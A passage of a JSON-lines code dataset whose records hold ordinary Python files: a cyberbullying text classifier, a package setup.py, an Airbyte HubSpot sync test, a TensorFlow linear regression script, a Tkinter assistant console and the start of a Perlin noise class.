sklearn.externals import joblib\nfrom scipy.stats import randint\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk import word_tokenize\nfrom nltk.util import ngrams\nfrom nltk.corpus import stopwords\nimport matplotlib.pyplot as plt\nimport scikitplot as skplt\nimport itertools\n\n#Function to remove stop words from a string\ndef remove_stop_words(element, stop_words):\n \n word_tokens = 
word_tokenize(element)\n sentence = \"\"\n for w in word_tokens:\n if w not in stop_words:\n sentence += w\n \n return sentence\n\n#Function to make word grams of a given number i.e. 3\ndef word_grams(words, number):\n \n tokens = word_tokenize(words)\n ngram_list = list(ngrams(tokens, number))\n sentence = \"\"\n for word in ngram_list:\n sentence += str(word)\n \n return sentence\n\n#Function to plot ROC curve\ndef plot_roc_curve(target_test, predicted, name):\n fpr, tpr, threshold = metrics.roc_curve(target_test, predicted, pos_label='Yes')\n roc_auc = metrics.auc(fpr, tpr)\n #This is only used when obtaining raw data for the report, otherwise use the plot\n#==============================================================================\n# print(\"---------------------------\\nROC Curve\\n---------------------------\")\n# print(\"Area under the curve: \", roc_auc)\n# print(\"fpr: \", fpr)\n# print(\"tpr: \", tpr)\n# print(\"threshold: \", threshold)\n#==============================================================================\n plt.figure()\n plt.title(name + ' Receiver Operating Characteristic Curve')\n plt.plot(fpr, tpr, 'b', label = 'AUC = %0.2f' % roc_auc)\n plt.legend(loc = 'lower right')\n plt.plot([0, 1], [0, 1],'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1.05])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.show()\n \n \n#Function to print confusion matrices to assess accuracy of classifiers\ndef plot_confusion_matrix(cm,classes,title='Confusion matrix'):\n \n plt.figure()\n plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation = 45)\n plt.yticks(tick_marks, classes)\n \n thresh = cm.max()/2.\n for i,j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, cm[i, j],horizontalalignment=\"center\",color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n 
plt.ylabel('True Label')\n plt.xlabel('Predicted Label')\n plt.show()\n \n \ndef load_file():\n \n data = []\n target = []\n \n #read CSV into a dataframe\n df = pd.read_csv(\"../datasets/Xu_Jun_Zhu_Bellmore_data/biggest_data.csv\")\n #Check for null values and get counts\n df = df[pd.notnull(df[\"Answer.ContainCyberbullying\"])]\n print(df['Answer.ContainCyberbullying'].value_counts())\n \n yes_count = 0\n for index, row in df.iterrows():\n if row['Answer.ContainCyberbullying'] == 'Yes':\n yes_count = yes_count + 1\n \n print(yes_count)\n \n no_counter = 0\n #Down sampling to make sure set is balanced, adding data and target to respective arrays\n for index, row in df.iterrows():\n if row['Answer.ContainCyberbullying'] == 'Yes':\n data.append(row['Input.posttext'])\n target.append(row['Answer.ContainCyberbullying'])\n else:\n if no_counter < yes_count:\n data.append(row['Input.posttext'])\n target.append(row['Answer.ContainCyberbullying'])\n no_counter = no_counter + 1\n \n return data, target\n\n\ndef preprocess():\n \n # Initialise Porter Stemmer & Lemmatization\n ps = PorterStemmer()\n lem = WordNetLemmatizer()\n # Create a set to hold stopwords that we don't want from NLTK\n stop_words = set(stopwords.words('english'))\n \n # Load in the file\n data,target = load_file()\n \n #Various methods of preprocessing, comment or uncomment to get various combinations\n \n#==============================================================================\n# #Stemming using Porter Stemming Algorithm\n# data = [(' '.join(ps.stem(token) for token in word_tokenize(element))) for element in data]\n#==============================================================================\n#==============================================================================\n# #Lemmatization using WordNet Lemmatizer Algorithm\n# data = [(' '.join(lem.lemmatize(token) for token in word_tokenize(element))) for element in 
data]\n#==============================================================================\n#==============================================================================\n# #Make Data into N-grams\n# data = [word_grams(element, 3) for element in data]\n#==============================================================================\n#==============================================================================\n# #Stop word removal\n# data = [remove_stop_words(element, stop_words) for element in data]\n#==============================================================================\n\n #Turn on TF-IDF\n tfidf = TfidfVectorizer(sublinear_tf=True, min_df=5, norm='l2', encoding='latin-1', ngram_range=(1, 2), stop_words='english')\n tfidf_data = tfidf.fit_transform(data)\n \n#==============================================================================\n# #Turn off TF-IDF\n# count_vectorizer = CountVectorizer(binary='true')\n# data = count_vectorizer.fit_transform(data)\n# tfidf_data = TfidfTransformer(use_idf=False).fit_transform(data)\n#==============================================================================\n\n return tfidf_data, target\n\ndef train_eval(data,target):\n \n #Array to hold the names of the classifiers we are going to test\n names = [\"KNN\", \"SVC\", \"Decision Tree\", \"Random Forest\", \"Bernoulli Naive Bayes\"]\n \n #Array holding the actual classifiers\n classifiers = [\n KNeighborsClassifier(),\n SVC(),\n DecisionTreeClassifier(random_state=107),\n RandomForestClassifier(),\n BernoulliNB()]\n \n #Split the data to have separate test data\n data_train,data_test,target_train,target_test = cross_validation.train_test_split(data,target,test_size=0.2,random_state=43)\n for name, clf in zip(names, classifiers):\n if name == \"SVC\":\n clf = SVC(probability=True, C=1000)\n clf.fit(data_train,target_train)\n predicted = clf.predict(data_test)\n predicted_probs = clf.predict_proba(data_test)[:,1]\n 
print(\"=================================================================\")\n print(name,\"classifier results\")\n print(\"-----------------------------------------------------------------\")\n #evaluate_model(target_test,predicted)\n print(classification_report(target_test,predicted))\n print(\"The accuracy score is {:.2%}\".format(accuracy_score(target_test,predicted)))\n #Plot precision recall curve\n probas = clf.predict_proba(data_test)\n skplt.metrics.plot_precision_recall_curve(target_test, probas, title=name+\" Precision Recall Curve\", cmap=\"hot\")\n plt.show()\n cnf_matrix = confusion_matrix(target_test,predicted)\n#==============================================================================\n# #This is only used when obtaining raw data for the report, otherwise use the plot\n# print(\"---------------------------\\nConfusion Matrix\\n---------------------------\")\n# print(cnf_matrix)\n#==============================================================================\n #Plot the confusion matrix\n graph_name = (name, \"Confusion Matrix\")\n plot_confusion_matrix(cnf_matrix, classes=['not bullying', 'bullying'],title =graph_name)\n #Plot the ROC curve\n plot_roc_curve(target_test, predicted_probs, name)\n optimized_hyper_parameters(data_train,data_test,target_train,target_test)\n \ndef optimized_hyper_parameters(data_train,data_test,target_train,target_test):\n \n print(\"=================================================================\")\n print(\"Optimized SVC hyper parameters\")\n print(\"-----------------------------------------------------------------\")\n classifier= joblib.load('SVC.pkl')\n #Get classifiers predictions for the test set\n test_predict = classifier.fit(data_train,target_train).predict(data_test)\n predicted_probs = classifier.fit(data_train,target_train).predict_proba(data_test)[:,1]\n print(classification_report(target_test,test_predict))\n print(\"The accuracy score is {:.2%}\".format(accuracy_score(target_test,test_predict)))\n 
#Plot precision recall curve\n probas = classifier.predict_proba(data_test)\n skplt.metrics.plot_precision_recall_curve(target_test, probas, title=\"SVC Precision Recall Curve\", cmap=\"hot\")\n plt.show()\n #Plot the confusion matrix\n cnf_matrix = confusion_matrix(target_test,test_predict)\n#==============================================================================\n# #This is only used when obtaining raw data for the report, otherwise use the plot\n# print(\"---------------------------\\nConfusion Matrix\\n---------------------------\")\n# print(cnf_matrix)\n#==============================================================================\n graph_name = (\"SVC Confusion Matrix\")\n plot_confusion_matrix(cnf_matrix, classes=['not bullying', 'bullying'],title =graph_name)\n #Plot the ROC curve\n plot_roc_curve(target_test, predicted_probs, \"SVC\")\n print(\"Parameters were: \", classifier.get_params())\n \n print(\"=================================================================\")\n print(\"Optimized Random Forest hyper parameters\")\n print(\"-----------------------------------------------------------------\")\n classifier= joblib.load('random_forest.pkl')\n #Get classifiers predictions for the test set\n test_predict = classifier.fit(data_train,target_train).predict(data_test)\n predicted_probs = classifier.fit(data_train,target_train).predict_proba(data_test)[:,1]\n print(classification_report(target_test,test_predict))\n print(\"The accuracy score is {:.2%}\".format(accuracy_score(target_test,test_predict)))\n #Plot precision recall curve\n probas = classifier.predict_proba(data_test)\n skplt.metrics.plot_precision_recall_curve(target_test, probas, title=\"Random Forest Precision Recall Curve\", cmap=\"hot\")\n plt.show()\n #Plot the confusion matrix\n cnf_matrix = confusion_matrix(target_test,test_predict)\n#==============================================================================\n# #This is only used when obtaining raw data for the report, 
otherwise use the plot\n# print(\"---------------------------\\nConfusion Matrix\\n---------------------------\")\n# print(cnf_matrix)\n#==============================================================================\n graph_name = (\"Random Forest Confusion Matrix\")\n plot_confusion_matrix(cnf_matrix, classes=['not bullying', 'bullying'],title =graph_name)\n #Plot the ROC curve\n plot_roc_curve(target_test, predicted_probs, \"Random Forest\")\n print(\"Parameters were: \", classifier.get_params())\n\n print(\"=================================================================\")\n print(\"Optimized Decision Tree hyper parameters\")\n print(\"-----------------------------------------------------------------\")\n classifier= joblib.load('d_tree.pkl')\n #Get classifiers predictions for the test set\n test_predict = classifier.fit(data_train,target_train).predict(data_test)\n predicted_probs = classifier.fit(data_train,target_train).predict_proba(data_test)[:,1]\n print(classification_report(target_test,test_predict))\n print(\"The accuracy score is {:.2%}\".format(accuracy_score(target_test,test_predict)))\n #Plot precision recall curve\n probas = classifier.predict_proba(data_test)\n skplt.metrics.plot_precision_recall_curve(target_test, probas, title=\"Decision Tree Precision Recall Curve\", cmap=\"hot\")\n plt.show()\n #Plot the confusion matrix\n cnf_matrix = confusion_matrix(target_test,test_predict)\n#==============================================================================\n# #This is only used when obtaining raw data for the report, otherwise use the plot\n# print(\"---------------------------\\nConfusion Matrix\\n---------------------------\")\n# print(cnf_matrix)\n#==============================================================================\n graph_name = (\"Decision Tree Confusion Matrix\")\n plot_confusion_matrix(cnf_matrix, classes=['not bullying', 'bullying'],title =graph_name)\n #Plot the ROC curve\n plot_roc_curve(target_test, predicted_probs, 
\"Decision Tree\")\n print(\"Parameters were: \", classifier.get_params())\n\n print(\"=================================================================\")\n print(\"Optimized KNN hyper parameters\")\n print(\"-----------------------------------------------------------------\")\n classifier= joblib.load('KNN.pkl')\n #Get classifiers predictions for the test set\n test_predict = classifier.fit(data_train,target_train).predict(data_test)\n predicted_probs = classifier.fit(data_train,target_train).predict_proba(data_test)[:,1]\n print(classification_report(target_test,test_predict))\n print(\"The accuracy score is {:.2%}\".format(accuracy_score(target_test,test_predict)))\n #Plot precision recall curve\n probas = classifier.predict_proba(data_test)\n skplt.metrics.plot_precision_recall_curve(target_test, probas, title=\"KNN Precision Recall Curve\", cmap=\"hot\")\n plt.show()\n #Plot the confusion matrix\n cnf_matrix = confusion_matrix(target_test,test_predict)\n#==============================================================================\n# #This is only used when obtaining raw data for the report, otherwise use the plot\n# print(\"---------------------------\\nConfusion Matrix\\n---------------------------\")\n# print(cnf_matrix)\n#==============================================================================\n graph_name = (\"KNN Confusion Matrix\")\n plot_confusion_matrix(cnf_matrix, classes=['not bullying', 'bullying'],title =graph_name)\n #Plot the ROC curve\n plot_roc_curve(target_test, predicted_probs, \"KNN\")\n print(\"Parameters were: \", classifier.get_params())\n \n \ndef main():\n #Set background colour for plots\n plt.rcParams['axes.facecolor'] = '#F9FFFD'\n #Get a start time for the program\n start_time = time.time()\n #load and preprocess datasets\n tf_idf, target = preprocess()\n #train classifiers on datasets & hyperoptimize\n train_eval(tf_idf,target)\n \n #Get the time taken in seconds\n 
print(\"\\n=================================================================\")\n print(\"Program ran in %s seconds\" % (time.time() - start_time))\n print(\"=================================================================\\n\")\n \n \nmain()","sub_path":"Xu_Jun_Zhu_Bellmore/XJZB_load_pkl.py","file_name":"XJZB_load_pkl.py","file_ext":"py","file_size_in_byte":15884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"448189435","text":"## -*- encoding: utf-8 -*-\n\"\"\"\nSageMath package for computing various moduli spaces invariants.\n\"\"\"\n\nimport os\nimport sys\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\nfrom codecs import open\n\n# Get information from separate files (README, VERSION)\ndef readfile(filename):\n with open(filename, encoding='utf-8') as f:\n return f.read()\n\n# For the tests\nclass SageTest(TestCommand):\n def run_tests(self):\n errno = os.system(\"sage -t --force-lib msinvar\")\n sys.exit(errno)\n\nsetup(\n name = 'msinvar',\n version = '0.1',\n description='SageMath package for computing various moduli spaces invariants',\n long_description = readfile(\"README.rst\"),\n # long_description = readfile(\"README.md\"),\n # long_description_content_type=\"text/markdown\",\n url='https://github.com/smzg/msinvar',\n author='Sergey Mozgovoy',\n author_email='mozhov@gmail.com',\n license='GPLv2+',\n classifiers=[\n # How mature is this project? 
Common values are\n # 3 - Alpha\n # 4 - Beta\n # 5 - Production/Stable\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Science/Research',\n 'Topic :: Software Development :: Build Tools',\n 'Topic :: Scientific/Engineering :: Mathematics',\n 'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)',\n 'Programming Language :: Python :: 3.7',\n ],\n keywords = 'SageMath moduli spaces invariants',\n packages = ['msinvar'],\n install_requires = [],\n cmdclass = {'test': SageTest}, # adding a special setup command for tests\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"525402303","text":"# MIT License\n#\n# Copyright (c) 2020 Airbyte\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\nimport json\nfrom pathlib import Path\nfrom typing import Any, Iterable, List, Mapping, MutableMapping, Tuple\n\nimport pytest\nfrom airbyte_protocol import ConfiguredAirbyteCatalog, SyncMode, Type\nfrom base_python import AirbyteLogger\nfrom source_hubspot.source import SourceHubspot\n\nHERE = Path(__file__).parent.absolute()\n\n\n@pytest.fixture(scope=\"session\", name=\"config\")\ndef config_fixture() -> Mapping[str, Any]:\n config_filename = HERE.parent / \"secrets\" / \"config.json\"\n\n if not config_filename.exists():\n raise RuntimeError(f\"Please provide config in {config_filename}\")\n\n with open(str(config_filename)) as json_file:\n return json.load(json_file)\n\n\n@pytest.fixture\ndef configured_catalog() -> ConfiguredAirbyteCatalog:\n catalog_filename = HERE.parent / \"sample_files\" / \"configured_catalog.json\"\n if not catalog_filename.exists():\n raise RuntimeError(f\"Please provide configured catalog in {catalog_filename}\")\n\n return ConfiguredAirbyteCatalog.parse_file(catalog_filename)\n\n\n@pytest.fixture\ndef configured_catalog_with_incremental(configured_catalog) -> ConfiguredAirbyteCatalog:\n streams = []\n for stream in configured_catalog.streams:\n if SyncMode.incremental in stream.stream.supported_sync_modes:\n stream.sync_mode = SyncMode.incremental\n streams.append(stream)\n\n configured_catalog.streams = streams\n return configured_catalog\n\n\ndef read_stream(\n source: SourceHubspot, config: Mapping, catalog: ConfiguredAirbyteCatalog, state: MutableMapping = None\n) -> Tuple[Mapping, List]:\n records = {}\n states = []\n for message in source.read(AirbyteLogger(), config, catalog, state):\n if message.type == Type.RECORD:\n 
records.setdefault(message.record.stream, [])\n records[message.record.stream].append(message.record)\n elif message.type == Type.STATE:\n states.append(message.state)\n\n return records, states\n\n\ndef records_older(records: Iterable, than: int, cursor_field: str) -> Iterable:\n for record in records:\n if record.data.get(cursor_field) < than:\n yield record\n\n\nclass TestIncrementalSync:\n def test_sync_with_latest_state(self, config, configured_catalog_with_incremental):\n \"\"\"Sync first time, save the state and sync second time with saved state from previous sync\"\"\"\n streams = {stream.stream.name: stream for stream in configured_catalog_with_incremental.streams}\n records1, states1 = read_stream(SourceHubspot(), config, configured_catalog_with_incremental)\n\n assert states1, \"should have at least one state emitted\"\n assert records1, \"should have at least few records emitted\"\n\n records2, states2 = read_stream(SourceHubspot(), config, configured_catalog_with_incremental, states1[-1].data)\n\n assert states1[-1] == states2[-1], \"final states should be the same\"\n for stream_name, state in states2[-1].data.items():\n cursor_field = streams[stream_name].cursor_field[0]\n old_records1 = records_older(records1[stream_name], than=records2[stream_name][0].data[cursor_field], cursor_field=cursor_field)\n old_records2 = records_older(records2[stream_name], than=records2[stream_name][0].data[cursor_field], cursor_field=cursor_field)\n assert list(old_records1), \"should have older records from the first read\"\n assert not list(old_records2), \"should not have older records from the second read\"\n","sub_path":"airbyte-integrations/connectors/source-hubspot/integration_tests/incremental_test.py","file_name":"incremental_test.py","file_ext":"py","file_size_in_byte":4587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"382494172","text":"from __future__ import print_function\n\nimport sys\nimport 
tensorflow as tf\nimport numpy\nimport matplotlib.pyplot as plt\nrng = numpy.random\n\n# # Input array of X values\n# X_array = map(float, raw_input().split())\n\n# Parameters\nlearning_rate = 0.001\ndisplay_step = 10\ntraining_epochs = 100\n\n# Training Data\ntrain_X = numpy.asarray([3.3,4.4,5.5,6.71,6.93,4.168,9.779,6.182,7.59,2.167,\n 7.042,10.791,5.313,7.997,5.654,9.27,3.1, 11.5, 8.5, 9.4, 2.02])\ntrain_Y = numpy.asarray([1.7,2.76,2.09,3.19,1.694,1.573,3.366,2.596,2.53,1.221,\n 2.827,3.465,1.65,2.904,2.42,2.94,1.3, 3.99, 3.48, 3.25, 1.08])\nn_sample = train_X.shape[0]\n# tf Graph Input\nX = tf.placeholder(\"float\", name='X', shape=[])\nY = tf.placeholder(\"float\", name='Y', shape=[])\n# Set model weights\nW = tf.Variable(rng.randn(), name='weights')\nb = tf.Variable(rng.randn(), name='bias')\n# Construct a linear model\npred = tf.add(tf.multiply(X, W), b)\n# Mean squared error\ncost = tf.divide(tf.reduce_sum(tf.pow(pred-Y, 2)), tf.to_float(2*n_sample), name='divide')\n# Gradient descent\n# Note, minimize() knows to modify W and b because Variable objects are trainable=True by default\noptimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost)\n# Initialize the variables (i.e. 
assign their default value)\n# saver = tf.train.Saver()\n# Start training\nwith tf.Session() as sess:\n # Run the initializer\n sess.run(tf.global_variables_initializer())\n \n tf.train.write_graph(sess.graph, '.',\n 'lin_reg.pb', as_text=False)\n # writer = tf.summary.FileWriter(\"linear_regression_model_graph\", sess.graph)\n # Fit all training data\n for epoch in range(training_epochs):\n for (x, y) in zip(train_X, train_Y):\n total_loss = 0\n _, loss = sess.run([optimizer, cost], feed_dict={X: x, Y: y})\n # total_loss += loss\n if epoch % display_step == 0:\n print('Epoch #{0}: {1}'.format(epoch, loss))\n\n # Display logs per epoch step\n # if (epoch+1) % display_step == 0:\n # c = sess.run(cost, feed_dict={X: train_X, Y:train_Y})\n # print(\"Epoch:\", '%04d' % (epoch+1), \"cost=\", \"{:.9f}\".format(c), \\\n # \"W=\", sess.run(W), \"b=\", sess.run(b))\n\n # print(\"Optimization Finished!\")\n # training_cost = sess.run(cost, feed_dict={X: train_X, Y: train_Y})\n # print(\"Training cost=\",training_cost, \"W=\",sess.run(W), \"b=\",sess.run(b), '\\n')\n\n # save_path = saver.save(sess, './my-model')\n # print(\"Model saved in path: %s\" % save_path)\n # saver = tf.train.import_meta_graph('./my-model.meta')\n # saver.restore(sess, tf.train.latest_checkpoint('./'))\n # outputTensors = sess.run(outputOps, feed_dict=feedDict)\n\n # # for index in range(len(X_array)):\n # X_value = X_array[index]\n # Y_value = tf.add(tf.multiply(W,X_value),b)\n # print(\"X value:\", X_value, \"Y value:\", sess.run(Y_value))\n\n\t# Graphic display\n plt.plot(train_X, train_Y, 'ro', label=\"Original Data\")\n plt.plot(train_X, sess.run(W) * train_X + sess.run(b), label='Fitted line')\n plt.legend()\n plt.show()\n\n # writer.close()\n # 2.35 3.22 3.05 2.85 4.55 4.32 1.35\n # # Testing example, as requested (Issue #2)\n # test_X = numpy.asarray([6.83, 4.668, 8.9, 7.91, 5.7, 8.7, 3.1, 2.1])\n # test_Y = numpy.asarray([1.84, 2.273, 3.2, 2.831, 2.92, 3.24, 1.35, 1.03])\n\n # 
print(\"Testing... (Mean square loss Comparison)\")\n # testing_cost = sess.run(\n # tf.reduce_sum(tf.pow(pred - Y, 2)) / (2 * test_X.shape[0]),\n # feed_dict={X: test_X, Y: test_Y}) # same function as cost above\n # print(\"Testing cost=\", testing_cost)\n # print(\"Absolute mean square loss difference:\", abs(\n # training_cost - testing_cost))\n\n # plt.plot(test_X, test_Y, 'bo', label='Testing data')\n # plt.plot(train_X, sess.run(W) * train_X + sess.run(b), label='Fitted line')\n # plt.legend()\n # plt.show()\n\n\n\n","sub_path":"Linear Regression Model/LRM1/linear_regression_model.py","file_name":"linear_regression_model.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"278699489","text":"import keyboard\nimport tkinter as tk\nfrom PIL import ImageTk, Image\nimport os\nfrom PIL import Image\n\n\"\"\"!! In Menu class from tkinter, add this line in unpost function : if hasattr(self.master, 'unfocus_allowed'): self.master.unfocus_allowed = True\"\"\"\n\nclass Tkinter_window(tk.Tk):\n def __init__(self, jarvis, auto_unfocus=True):\n tk.Tk.__init__(self)\n self.path = os.path.dirname(os.path.abspath(__file__))\n self.auto_unfocus = auto_unfocus\n self.jarvis = jarvis\n self.x, self.y = 1065, 240\n self.length, self.height = 200, 200\n self.bg_opacity = 0.7\n self.geometry(\"{}x{}+{}+{}\".format(str(self.length), str(self.height), str(self.x), str(self.y)))\n self.bg, self.fg = 'grey1', 'white'\n self.configure(bg=self.bg)\n self.image = tk.PhotoImage(file=f'{self.path[:-17]}/Ressources/jarvis_icon.png').subsample(30, 30)\n icon = tk.Label(self, image=self.image, bd=0)\n icon.image = self.image\n\n im = Image.open(f'{self.path[:-17]}/Ressources/jarvis_icon.png')\n print(im.mode)\n\n\n icon.place(x=10, y=10)\n self.labels_counter = -1\n self.title = Tkinter_label(self, 'Jarvis Console', x=50, y=26, fg='dodger blue', bold=True, size=11)\n self.labels = []\n 
self.important_messages = []\n self.define_menu()\n self.hidden, self.dragged, self.unfocus_allowed, self.last_loop_state = False, False, True, False\n self.add_label(text='Je me réveille...')\n\n self.bind('', self.popup_menu)\n self.bind('', self.press_click)\n self.bind('', self.release_click)\n if self.auto_unfocus: self.bind('', self.unfocus)\n self.bind(\"\", self.drag)\n self.bind('C', self.jarvis.kill)\n self.bind('', self.jarvis.kill)\n self.bind('A', self.add_label)\n self.attributes('-alpha', self.bg_opacity)\n self.overrideredirect(True)\n self.refresh()\n\n def refresh(self):\n try:\n if keyboard.is_pressed('ctrl+maj+h'):\n if self.last_loop_state == None:\n self.hide_unhide()\n self.last_loop_state = 'hidden'\n else: self.last_loop_state = None\n\n self.attributes(\"-topmost\", True)\n self.update()\n except: pass\n\n def define_menu(self):\n self.menu = tk.Menu(self, tearoff=0)\n self.menu.add_command(label='Hide', command=self.hide_unhide)\n self.menu.add_command(label='Clear', command=self.clear)\n self.menu.add_command(label='Change color', command=self.change_color)\n self.menu.add_command(label='Change opacity', command=self.change_opacity)\n self.menu.add_command(label='Kill Jarvis', command=self.jarvis.kill)\n\n def popup_menu(self, event):\n self.unfocus_allowed = False\n self.menu.post(event.x_root, event.y_root)\n\n def hide_unhide(self, *args):\n self.unfocus_allowed = True\n if self.hidden:\n self.x, self.y, self.height, self.hidden = self.winfo_x() - 175, self.winfo_y(), self.height + 150, False\n self.menu.entryconfigure(0, label=\"Hide\")\n else:\n self.x, self.y, self.height, self.hidden = 1240, self.winfo_y(), self.height - 150, True\n self.menu.entryconfigure(0, label=\"Unhide\")\n self.geometry(\"{}x{}+{}+{}\".format(str(self.length), str(self.height), str(self.x), str(self.y)))\n\n def unfocus(self, *args):\n if self.unfocus_allowed:\n keyboard.press('alt')\n keyboard.press('tab')\n keyboard.release('alt')\n 
keyboard.release('tab')\n\n def press_click(self, event):\n self.x = event.x\n self.y = event.y\n\n def release_click(self, event):\n if self.hidden and not self.dragged:\n self.hide_unhide()\n else: self.x, self.y = self.winfo_x(), self.winfo_y()\n self.dragged = False\n self.geometry(\"{}x{}+{}+{}\".format(str(self.length), str(self.height), str(self.x), str(self.y)))\n if self.auto_unfocus: self.unfocus('event')\n\n def drag(self, event):\n self.dragged = True\n deltay = event.y - self.y\n y = self.winfo_y() + deltay\n if not self.hidden:\n deltax = event.x - self.x\n x = self.winfo_x() + deltax\n else:\n x = self.winfo_x()\n self.geometry(f\"+{x}+{y}\")\n\n def add_label(self, *args, text='test', type='normal'):\n if type == 'error': color = 'red'\n elif type == 'warning': color = 'orange'\n elif type == 'arduino': color = 'dodger blue'\n else: color = self.fg\n if self.labels_counter <= 7:\n if len(text)<27: self.labels.append(Tkinter_label(self, text, fg=color, type=type))\n else:\n self.labels.append(Tkinter_label(self, text[:28], fg=color, type=type))\n self.labels.append(Tkinter_label(self, text[28:], fg=color, type=type))\n else:\n cut = self.labels[0]\n if cut['bg'] == 'red' or cut['bg'] == 'orange': self.important_messages.append(cut['text'])\n cut.destroy()\n self.labels.pop(0)\n self.labels_counter -= 1\n for label in self.labels :\n label.y = label.y-18\n label.place(x=label.x, y=label.y)\n self.labels.append(Tkinter_label(self, text, fg=color, type=type))\n\n self.refresh()\n\n def clear(self):\n self.unfocus_allowed = True\n n = len(self.labels)\n for i in range(n):\n self.labels[0].destroy()\n self.labels.pop(0)\n self.labels_counter = 0\n\n def change_color(self):\n Tkinter_scale(self, type='color')\n\n def change_opacity(self):\n Tkinter_scale(self, type='opacity')\n\n def kill(self, *args):\n try: self.destroy()\n except: pass\n\n\nclass Tkinter_label(tk.Label):\n def __init__(self, app, text, x=10, y=45, fg=None, bg=None, size=10, bold=False, 
type='normal'):\n tk.Label.__init__(self, app)\n self.app = app\n self.type = type\n if bg == None: bg = self.app.bg\n if fg == None: fg = self.app.fg\n if bold: bold='bold'\n elif not bold: bold=''\n self.x, self.y = x, y+18*self.app.labels_counter\n self.fg, self.bg, self.text = fg, bg, text\n self.config(text=self.text, fg=self.fg, bg=self.bg, font=f'monospace {size} {bold}')\n self.place(x=self.x, y=self.y)\n self.app.labels_counter += 1\n\n\nclass Tkinter_scale(tk.Scale):\n def __init__(self, app, type):\n tk.Scale.__init__(self, app)\n self.app = app\n bg_num = int(''.join([i for i in list(self.app.bg) if i.isdigit()]))\n fg = 'grey'+str(int(100-bg_num))\n if type == 'color':\n self.set(bg_num)\n command = self.send_color_value\n elif type == 'opacity':\n self.set(self.app.bg_opacity*100)\n command = self.send_opacity_value\n self.config(orient='horizontal', from_=0, to=99, cursor='hand2', font='monospace 10',\n resolution=2, length=185,\n bg=self.app.bg, fg=fg, troughcolor=self.app.bg, command=command)\n self.bind('', self.kill)\n self.app.unbind('')\n self.app.unbind('')\n self.app.unbind(\"\")\n self.app.unfocus_allowed = False\n self.place(x=5, y=150)\n\n def send_color_value(self, value):\n value = int(value)\n self.app.bg = f'grey{value}'\n self.app.configure(bg=self.app.bg)\n self.app.title.config(bg=self.app.bg)\n bg_num = int(''.join([i for i in list(self.app.bg) if i.isdigit()]))\n self.app.fg = 'grey'+str(int(100-bg_num))\n self.config(bg=self.app.bg, fg=self.app.fg, troughcolor=self.app.bg)\n for label in self.app.labels:\n label.config(bg=self.app.bg)\n if label.type == 'normal': label.config(fg=self.app.fg)\n\n def send_opacity_value(self, value):\n self.app.bg_opacity = int(value)/100\n self.app.attributes('-alpha', self.app.bg_opacity)\n\n def kill(self, event):\n self.app.bind('', self.app.press_click)\n self.app.bind('', self.app.release_click)\n self.app.bind(\"\", self.app.drag)\n self.app.unfocus_allowed = True\n if self.app.auto_unfocus: 
self.app.unfocus()\n self.destroy()\n","sub_path":"normal version/with_joystick/v2/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":8555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"482708723","text":"import tkinter as tk\r\nimport math\r\nimport view\r\nimport random\r\n\r\n\r\nclass PerlinNoise(object):\r\n \"\"\"Object that represents properties of the perlin noise to be drawn\"\"\"\r\n\r\n def __init__(self, master):\r\n\r\n self._master = master\r\n self._scaling_factor = 2\r\n self._seed_length = 256\r\n self._octave_count = 8\r\n self._seed = [random.random() for i in range(int(self._seed_length))]\r\n self._generations = []\r\n self.generate_octaves()\r\n\r\n def generate_seed(self):\r\n '''\r\n Function that generates a new seed\r\n '''\r\n self._seed = [random.random() for i in range(int(self._seed_length))]\r\n\r\n def get_seed(self):\r\n '''\r\n Getter function that returns seed length\r\n '''\r\n return self._seed\r\n\r\n def change_octave_count(self, change):\r\n '''\r\n Function that changes octave count\r\n '''\r\n if change == 1:\r\n if 2**self._octave_count < self._seed_length:\r\n self._octave_count += 1\r\n return True\r\n else:\r\n if self._octave_count > 1:\r\n self._octave_count -= 1\r\n return True\r\n return False\r\n\r\n def change_scaling_factor(self, change):\r\n '''\r\n Function that changes scaling factor\r\n '''\r\n if change == 1:\r\n if self._scaling_factor + 0.1 <= 3.5:\r\n self._scaling_factor += 0.1\r\n else:\r\n if self._scaling_factor - 0.1 >= 0.5:\r\n self._scaling_factor -= 0.1\r\n\r\n def change_seed_length(self, change):\r\n 